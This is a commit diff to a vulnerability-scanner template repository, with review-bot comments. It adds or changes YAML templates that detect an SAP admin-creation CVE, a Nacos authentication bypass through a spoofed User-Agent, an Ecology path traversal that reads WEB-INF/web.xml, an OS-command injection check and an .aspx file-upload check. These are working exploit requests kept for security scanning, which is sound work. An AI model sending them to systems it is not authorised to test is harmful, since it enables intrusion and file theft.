Noam Rathaus 2021-05-05 17:04:59 +03:00
commit 07c2e79fb9
14 changed files with 178 additions and 27 deletions


@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 305 | vulnerabilities | 145 | exposed-panels | 124 |
| takeovers | 68 | exposures | 91 | technologies | 66 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| cves | 306 | vulnerabilities | 147 | exposed-panels | 124 |
| takeovers | 68 | exposures | 92 | technologies | 66 |
| misconfiguration | 56 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1049 files**.
**103 directories, 1054 files**.
</td>
</tr>


@ -68,7 +68,7 @@ requests:
- "not found in <b>([/a-z_]+)wp"
req-condition: true
matchers-condition: or
matchers-condition: and
matchers:
- type: word


@ -12,16 +12,6 @@ info:
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
# Affected Versions: 7.30, 7.31, 7.40, 7.50
# p.s:
# > Don't forget to change the default credentials
# > to create new admin in associated file:
# > `payloads/CVE-2020-6287.xml`
# Ref:
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
requests:
- payloads:
data: helpers/payloads/CVE-2020-6287.xml
@ -41,4 +31,9 @@ requests:
part: body
- type: status
status:
- 200
- 200
- type: word
words:
- "text/xml"
part: header
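Review bot: The deleted `p.s:` comment lines were the only statement that the payload referenced at `helpers/payloads/CVE-2020-6287.xml` creates a new admin account with default credentials, and the new side keeps no trace of that side effect. A template that creates an account on a vulnerable host should carry that in `info` rather than in a removed comment, e.g. `description: The request posts helpers/payloads/CVE-2020-6287.xml, which creates a new admin user; change its default credentials before use and remove the account after testing.` The added `text/xml` header word matcher is a reasonable companion to the `200` status check. The enclosing `requests` block starts outside the hunk.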


@ -15,7 +15,6 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
attack: sniper
raw:
@ -40,16 +39,15 @@ requests:
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
- "kern\\.ostype"
condition: or
part: body
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "Microsoft Windows (.*)"
- "kern\\.ostype: (.*)"
- "Distributor ID: (.*)"


@ -34,3 +34,8 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header


@ -0,0 +1,49 @@
id: CVE-2021-29441
info:
name: Nacos prior to 1.4.1 Authentication Bypass
description: |
This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
enables Nacos servers to bypass this filter and therefore skip authentication checks.
This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
This issue may allow any user to carry out any administrative tasks on the Nacos server.
author: dwisiswant0
severity: high
reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
tags: nacos,auth-bypass,cve,cve2021
requests:
- raw:
- |
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Nacos-Server
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 403"
- "status_code_2 == 200"
condition: and
- type: dsl
dsl:
- "contains(body_1, 'Forbidden')"
- "contains(body_2, 'true')"
condition: and
- type: word
words:
- "application/json"
part: header
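Review bot: Both POSTs publish a configuration entry (`dataId=nacos.cfg.dataIdfoo`, `group=foo`, `content=helloWorld`) on every target where the second request is accepted, and the `description` says nothing about this leftover. Add a sentence such as `Note: on vulnerable hosts this check writes a config entry (dataId nacos.cfg.dataIdfoo, group foo) that should be removed after testing.` The opening sentence of the description, `This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5`, is easier to read if the excluded range is named directly, e.g. `This template does not work on Nuclei engine versions 2.3.3 and 2.3.4.` The DSL matchers pairing `status_code_1 == 403` with `status_code_2 == 200` under `condition: and` are a sound differential check.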


@ -0,0 +1,25 @@
id: gogs-install-exposure
info:
name: Gogs install exposure
author: dhiyaneshDk
severity: high
tags: gogs,exposure
requests:
- method: GET
path:
- '{{BaseURL}}/install'
matchers-condition: and
matchers:
- type: word
words:
- "General Settings"
- "Database Settings"
part: body
condition: and
- type: status
status:
- 200
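Review bot: `info` carries no `description` or `reference`, so a reader cannot tell what a reachable `/install` page implies without already knowing Gogs; the matched strings `General Settings` and `Database Settings` indicate the setup form is being served. Add something like `description: The Gogs install page is reachable and serves the setup form; confirm whether the instance has completed installation.` and a `reference` pointing at the Gogs documentation for the installer. The two body words ANDed with a `200` status are specific enough for this page.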


@ -21,5 +21,6 @@ requests:
- type: word
words:
- '{{randstr}}'
- 'suggestions'
- '"results":'
- '"suggestions":'
condition: and


@ -4,7 +4,7 @@ info:
name: Nginx Status Page
author: dhiyaneshDK
severity: low
tags: config,nginx
tags: misconfig,nginx
requests:
- method: GET


@ -0,0 +1,25 @@
id: nginx-vhost-traffic-status
info:
name: Nginx Vhost Traffic Status
author: geeknik
reference: https://github.com/vozlt/nginx-module-vts
severity: low
tags: status,nginx,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/status"
matchers-condition: and
matchers:
- type: word
words:
- "Nginx Vhost Traffic Status"
- "Host"
- "Zone"
condition: and
- type: status
status:
- 200
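Review bot: `info` has a `reference` but no `description`, so the template does not say what the `/status` page discloses or why it is rated `low`; add one line such as `description: The nginx-module-vts status page is exposed at /status and lists per-host and per-zone traffic statistics (wording to be confirmed against the module README).` The words `Host` and `Zone` are short, common tokens that add little under `condition: and` beyond the title `Nginx Vhost Traffic Status`; if more specificity is wanted, longer column labels from the page would serve better.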


@ -16,10 +16,10 @@ requests:
- type: regex
part: header
regex:
- kong+
- "[Ss]erver: [Kk]ong+"
extractors:
- type: regex
- type: kval
part: header
regex:
- .*kong.*
kval:
- server
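Review bot: In the new regex `[Ss]erver: [Kk]ong+` the `+` quantifies only the final `g`, so the pattern matches `kong`, `kongg`, … and the quantifier contributes nothing (the replaced `kong+` had the same shape). If the intent is a case-insensitive match of the header value, `- "(?i)server: kong"` is clearer and also covers spellings such as `KONG` that the two-letter classes miss. Replacing the `.*kong.*` regex extractor with `kval` on `server` is an improvement, since it returns the whole header value. The enclosing matcher list starts outside the hunk.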


@ -0,0 +1,20 @@
id: ecology-filedownload-directory-traversal
info:
name: Ecology Directory Traversal
author: princechaddha
severity: medium
tags: ecology,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<url-pattern>/weaver/"
part: body
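Review bot: `info` has no `description` or `reference`, so the template names neither the affected component nor why `<url-pattern>/weaver/` in the body proves the read succeeded; add e.g. `description: The ln.FileDownload endpoint follows ../ in the fpath parameter and returns the application's WEB-INF/web.xml.` Whether `severity: medium` fits an unauthenticated file read depends on what else the endpoint can reach, which the template does not say; a `reference` would let a reader check that. The status-then-word matcher order differs from the other new templates in this commit, which list the word matcher first.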


@ -0,0 +1,32 @@
id: gloo-unauth
info:
name: Unauthenticated Gloo UI
author: dhiyaneshDk
severity: high
tags: unauth,gloo
requests:
- method: GET
path:
- '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails'
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
Content-type: "application/grpc-web+proto"
Referer: "{{BaseURL}}/admin/"
matchers-condition: and
matchers:
- type: word
words:
- "gke-remote"
part: body
- type: word
words:
- "application/grpc-web+proto"
part: header
- type: status
status:
- 200
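Review bot: The body word `gke-remote` in the first matcher looks like a cluster name from the author's test environment rather than a stable marker of a `ListClusterDetails` response, so the template would miss deployments whose clusters are named differently; confirm the string is part of the fixed response encoding, otherwise replace it with a token every response carries or rely on the `application/grpc-web+proto` header plus the `200` status. The hard-coded Firefox 55 `User-Agent` is an unexplained constant; if the endpoint requires a browser-like agent, a comment saying so would help, otherwise it can be dropped. `info` also lacks a `description` stating that the gRPC-web API answers without credentials.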


@ -21,7 +21,7 @@ requests:
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
Content-Type: image/jpeg
Poc_Test
{{randstr}}
-----------------------------20873900192357278038549710136--
- |
@ -38,7 +38,8 @@ requests:
regex:
- "(.*?.ASPX)"
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body, 'Poc_Test') && status_code == 200"
- "contains(body_2, '{{randstr}}') && status_code_2 == 200"